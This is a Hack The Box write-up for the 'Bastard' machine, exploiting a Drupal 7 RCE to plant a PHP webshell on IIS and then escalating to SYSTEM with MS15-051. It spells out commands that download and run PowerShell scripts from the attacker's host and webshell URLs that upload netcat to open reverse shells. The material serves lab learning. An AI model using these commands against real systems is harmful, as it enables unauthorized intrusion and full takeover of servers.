twitter

Hack The Box: Bastard

Difficulty: Medium
Machine Creator: ch4p
Tools Used:

NMAP
Droopescan
Searchsploit
PHP
Burp Suite
Remote Code Execution
Powershell Empire: Powerup.ps1
Sherlock
Netcat

Task: To find User.txt and Root.txt
Network Enumeration

Let’s start with an NMAP scan.

nmap -sV -sC 10.10.10.9


Looking at the nmap results we can see this is a Microsoft IIS server 7.5 which is Server 2008 R2. We can also see that this is hosting a drupal 7 website.

HTTP – Drupal


If we open this web page in a browser we can see this is in fact a drupal instance.

Droopescan

For Drupal we can use a tool called droopescan. We can install using python pip installer.

Apt-get install python-pip
pip install droopsescan

Now we can run droopescan against the remote server. This will take a while to finish.

droopescan scan drupal -u http://10.10.10.9


The results from the scan are not too helpful we do get the exact version of drupal.

Searchsploit

We know this is a drupal7 server lets use searchsploit to see if there are any vulnerabilities that we may be able to use.

searchsploit drupal


Our search returned everything for drupal and we can see one that is called 7.x Remote Code Execution (RCE).

Lets copy the exploit to our working directory.

cp /usr/share/exploitdb/exploits/php/webapps/41564.php .

We need to manually edit this exploit which is written in PHP.
First install php-curl

apt-get install php-curl


Edit everything in yellow. Change the url and add the php code that will be executing.


After running our exploit we get an error. We need to troubleshoot this.

Burp Suite

Let’s setup port forwarding. We will direct everything pointing to localhost:1337 to 10.10.10.9:80


Click on proxy then go to the options tab. Click on add and on the binding tab put in a random port.

Now setup the request handling.


On the request handling set the redirect to host 10.10.10.9 and redirect to port 80. Click OK.


We can test this now in the browser if we type in 127.0.0.1:1337 it takes us to the remote drupal page.

Now we need to update our exploit to route through the proxy.


We need to change the $url to the localhost with the port we specified.


We do want to make one change in the options tab under Intercept Client Requests. We want to make sure Intercept requests based on the following rules is checked and the File extension is unchecked.


If we run our code and check the HTTP history in Burp we can see 404 error page not found.


Lets send this post request to repeater. Right click on the post and send to repeater.


After some trial and error I found that if we edit the post to rest and click on go we get a 200 OK.


We need to edit our exploit change the URL back to 10.10.10.9 and set the endpoint_path to /rest.

Exploit Execution


If we run the exploit now get a successful file written on the remote server.


Now we can verify the upload by going to http://10.10.10.9/exploit.php and we see a blank page. There are no errors so we know the file exists.

Remote Code Execution


To run Remote Code Execution from our webshell we just need to add the function ?exec= and the command we want to run. In this example I ran dir to get the directory listings.


If we run our RCE with systeminfo we can see the OS Version and the Hotfixes. Google search will show that this machine is missing a service pack and has not been updated. Service pack 1 will show OS Version 6.1.7601.

Powershell Empire

We can find vulnerabilities using powerup from powershell empire.
Let’s download Powershell Empire.

git clone https://github.com/EmpireProject/Empire.git

Now that we have PSE downloaded lets copy the PowerUp.ps1 so we can edit it.

cp Empire/data/module_source/privesc/PowerUp.ps1 .


PowerUp.ps1 was made to run inside of empire so we need to add at the botom of the file “Invoke-AllChecks” and save.


Let’s start a simple python http server.

Now we need to pull the PowerUp.ps1 from our web server and execute on the remote machine.

In the webshell we can add this command.

http://10.10.10.9/exploit.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.11:8000/PowerUp.ps1’) | powershell -noprofile –


We can see that powerup download from our python http server and executed.


After a couple of min we can see the results from the powerup.ps1.

Looking at the results we can see access denied which tells us that we don’t have admin rights.

Going through the results there is nothing that can help us elevate our permissions.

Sherlock

Let’s try finding a vulnerability using sherlock.ps1

wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1


Just like before we need to edit the end of the file this time with Find-AllVulns.

We can copy and execute sherlock the same way that we did powerup.

10.10.10.9/exploit.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.11:8000/Sherlock.ps1’) | powershell -noprofile –


After running sherlock in our webshell we get a list of possible vulnerabilities.

Reverse Shell Netcat

Before we do our privledge elevation we need a remote shell we can do this with netcat x64 verison.

wget https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip

Unzip the netcat files so we can upload and run them.

Setup our netcat listener.

nc -lvnp 8081

Make sure the python simplehttp server is running

Python -m SimpleHTTPserver

Enter the follow url in the browser to upload netcat x64 and create a reverse shell.

http://10.10.10.9/exploit.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.14.11 8081


As you can see when we entered the code in the browser the remote server initiated get to our python http server to download the nc64.exe and after downloading there was a reverse shell created.


This netcat shell is running as low privledge.

Privledge Eseclation


If we look back at the sherlock powershell scan we did earlier we already know that this is a default install with no patching so it should be vulnerable to MS15-051.

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051


From the github page we need to download the “MS15-051-KB3045171.zip” file and extract.

 


We need to extract the 64-bit version. MS15-051×64.exe

MS15-051 exploit

10.10.10.9/exploit.php?fupload=ms15-051×64.exe&fexec=ms15-051×64.exe whoami


Similiar to the netcat upload we can upload this exploit and run it. In this example I’m doing a whoami and we can see that were running as system.

Privledge Netcat

Similiar to the previous netcat we did were going to execute the existing nc file and create a 2nd reverse shell running as system.

nc -lvnp 8082

10.10.10.9/exploit.php?fupload=ms15-051×64.exe&fexec=ms15-051×64.exe “nc -e 10.10.14.11 8082”


After executing the new exploited netcat listener we now have a system level reverse shell.

User.txt and Root.txt


With our new system netcat shell we  can read the contents of the user.txt


And we can view the contents of root.txt.txt.